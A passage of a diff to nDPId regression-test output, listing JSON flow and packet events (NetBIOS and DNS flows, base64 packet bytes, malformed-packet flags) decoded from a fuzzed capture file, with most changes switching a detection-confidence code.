+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1120471068711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120471068711,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABObF8AAIARSe4+qAECwKgB\/wCJAIkAOls0hWcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNNQAgAAE="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1120471077370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471077370,"pkt":"ADBUADRWAODtAW69CABFAABIbGAAAIARSvHAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1120471078365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABIbGEAAIARSvDAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471080368} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABjbGIAAIARSu\/AqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3muZXJjaXR5AmRrAAAhAAE="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1120471082371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471082371,"pkt":"ADBUADRWAODtAW69CABFAABIbGMAAIARSu7AqDYCwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcCVzAHAJY2liZXJjaXR5AmRrAAAhAAE="} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1120471084097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120471084097,"pkt":"ADBUADQ1AODtAW69CABFAAA+bGQAAIARSvfAqAECwKgBAQsOADUAKohoTTQBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAQQEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16641,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16641,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1120471085095,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120471085095,"pkt":"JDBUADRWAODtAW69CABFAAA+bGUAAIARSvbAqAECwKgBAQsOADUAKohoTTUBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471084097,"flow_last_seen":1120471085095,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471085095,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471084097,"flow_last_seen":1120471085095,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120471085095,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1120471086377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471086377,"pkt":"ADBUADRWAODtAW69CABFAABIbGYAAIARSut0qAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471086377,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1120471087098,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120471087098,"pkt":"ADBUADRWAODtAW69CABFAAA+bGcAAIARSvTAqAECwKgBAQsOADUAKohoTTUBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473527,"flow_last_seen":1120470473527,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473527,"flow_last_seen":1120470473527,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 